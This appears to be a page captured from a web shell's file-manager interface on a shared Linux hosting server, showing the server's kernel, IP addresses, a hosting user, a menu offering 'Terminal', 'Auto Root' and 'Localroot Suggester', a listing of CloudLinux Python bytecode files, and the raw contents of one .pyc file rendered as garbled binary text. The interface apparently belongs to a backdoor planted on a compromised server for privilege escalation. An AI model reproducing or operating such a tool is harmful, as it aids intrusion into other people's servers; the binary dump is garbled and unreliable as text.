Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
l.v.e-manager /
utils /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
cloudlinux_cli.cpython-311.pyc
67.25
KB
-rw-r--r--
2026-08-11 11:38
cloudlinux_cli_user.cpython-311.pyc
23.41
KB
-rw-r--r--
2026-08-11 11:38
cpanel_api.cpython-311.pyc
14.66
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_base.cpython-311.pyc
1.1
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_cpanel.cpython-311.pyc
6.03
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_da.cpython-311.pyc
4.84
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_plesk.cpython-311.pyc
2.25
KB
-rw-r--r--
2026-08-11 11:38
libcagefs.cpython-311.pyc
10.05
KB
-rw-r--r--
2026-08-11 11:38
libcloudlinux.cpython-311.pyc
46.66
KB
-rw-r--r--
2026-08-11 11:38
libsupport.cpython-311.pyc
2.38
KB
-rw-r--r--
2026-08-11 11:38
sync_locales.cpython-311.pyc
5.05
KB
-rw-r--r--
2026-08-11 11:38
ui_package_installer.cpython-311.pyc
7.88
KB
-rw-r--r--
2026-09-04 11:50
Save
Rename
� � {j� � �� � d dl mZ d dl mZ d dl mZ d dlZd dlZd dlZd dlZd dlZd dl Z d dl Z d dlmZ d dl mZmZ G d� de� � Z ej d � � Z G d � d� � ZdS )� )�absolute_import)�division)�print_functionN)�Enum)�is_nginx_running� is_ubuntuc � � e Zd ZdZdZdZdS )�State� installed� installing� not_installedN)�__name__� __module__�__qualname__� INSTALLED� INSTALLING� NOT_INSTALLED� � �6/usr/share/l.v.e-manager/utils/ui_package_installer.pyr r s � � � � � ��I��J�#�M�M�Mr r z^[A-Za-z0-9][A-Za-z0-9._+-]*$c �J � e Zd Zd� Zd� Zd� Zd� Zd� Zd� Zd� Z d� Z d � Zd � ZdS )�UIPackageInstallerc �� � t |t � � rt � |� � s"t d� |� � � � �|| _ || _ || _ d S )Nzinvalid package_name: {!r}) � isinstance�str�_PACKAGE_NAME_RE�match� ValueError�format�PACKAGE_NAME�PACKAGE_PATH�PACKAGE_INSTALL_ERROR_LOG)�self�package_name�package_path�error_log_paths r �__init__zUIPackageInstaller.__init__'